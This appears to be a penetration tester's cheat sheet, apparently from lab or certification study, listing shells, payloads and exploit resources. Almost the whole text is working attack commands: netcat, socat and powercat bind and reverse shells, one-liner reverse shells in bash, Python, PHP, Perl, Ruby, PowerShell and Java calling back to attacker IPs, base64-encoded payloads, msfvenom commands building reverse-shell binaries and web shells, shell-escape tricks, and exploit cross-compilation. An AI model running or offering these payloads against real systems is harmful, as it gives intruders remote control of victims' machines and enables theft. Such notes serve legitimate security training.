Shells, Payloads & Exploit
Shells and Payloads
# Netcat Bind Shell
nc -nlvp 4444 -e cmd.exe
nc -nv 10.11.0.22 4444
# Netcat Reverse Shell
nc -nlvp 4444
nc -nv 10.11.0.22 4444 -e /bin/bash
# Different commands used to get reverse shell : https://www.revshells.com
Bash : bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
Python : python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
PHP : php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
PERL : perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Netcat : nc -e /bin/sh 10.0.0.1 1234
Netcat : rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
Ruby : ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
Powershell : powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.158',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
Java :
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
# Different commands used to spawn an interactive shell on a linux-based system
Python : python -c 'import pty; pty.spawn("/bin/sh")'
Sh : /bin/sh -i
Perl : perl —e 'exec "/bin/sh";'
Ruby : ruby: exec "/bin/sh"
Lua : Lua: os.execute('/bin/sh')
awk : awk 'BEGIN {system("/bin/sh")}'
find : find / -name nameoffile 'exec /bin/awk 'BEGIN {system("/bin/sh")}' \;
find : find . -exec /bin/sh \; -quit
vim : vim -c ':!/bin/sh'
# Upgrade shell TTY
python -c 'import pty; pty.spawn("/bin/bash")'
ctrl+z
stty raw -echo;fg
<enter><enter>
reset
xterm
# Socat Reverse Shells
socat -d -d TCP4-LISTEN:443 STDOUT
socat TCP4:10.11.0.22:443 EXEC:/bin/bash
# Socat Encrypted Bind Shells
openssl req -newkey rsa:2048 -nodes -keyout bind_shell.key -x509 -days 362 -out bind_shell.crt
cat bind_shell.key bind_shell.crt > bind_shell.pem
sudo socat OPENSSL-LISTEN:443,cert=bind_shell.pem,verify=0,fork EXEC:/bin/bash
socat - OPENSSL:10.11.0.4:443,verify=0
# Powercat Reverse Shells
sudo nc -lvp 443
powercat -c 10.11.0.4 -p 443 -e cmd.exe
# Powercat Bind Shells
powercat -l -p 443 -e cmd.exe
nc 10.11.0.22 443
# Powercat Stand-Alone Payloads
powercat -c 10.11.0.4 -p 443 -e cmd.exe -g > reverseshell.ps1
./reverseshell.ps1
# Creating a stand-alone encoded Base64 payload
powercat -c 10.11.0.4 -p 443 -e cmd.exe -ge > encodedreverseshell.ps1
powershell.exe -E "Base64 encoded payload"
# MSFvenom command used to generate a linux-based reverse shell stageless payload
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f elf > nameoffile.elf
# MSFvenom command used to generate a Windows-based reverse shell stageless payload
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f exe > nameoffile.exe
# MSFvenom command used to generate a MacOS-based reverse shell payload
msfvenom -p osx/x86/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f macho > nameoffile.macho
# MSFvenom command used to generate a ASP web reverse shell payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.113 LPORT=443 -f asp > nameoffile.asp
# MSFvenom command used to generate a JSP web reverse shell payload
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f raw > nameoffile.jsp
# MSFvenom command used to generate a WAR java/jsp compatible web reverse shell payload
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f war > nameoffile.war
# Location of laudanum webshells on ParrotOS and Pwnbox
/usr/share/webshells/laudanum
# Location of Antak-Webshell on Parrot OS and Pwnbox
/usr/share/nishang/Antak-WebShellExploit
# Online
https://www.exploit-db.com
https://packetstorm.news
https://github.com
# Offline
Metasploit
searchsploit
/usr/share/nmap/scripts/Cross-Compiling Exploit Code
# Compiling exploit for windows target
i686-w64-mingw32-gcc 42341.c -o syncbreeze_exploit.exe -lws2_32
# run exploit with wine in linux
sudo wine syncbreeze_exploit.exe
# Packing chishel with upx
upx brute chiselLast updated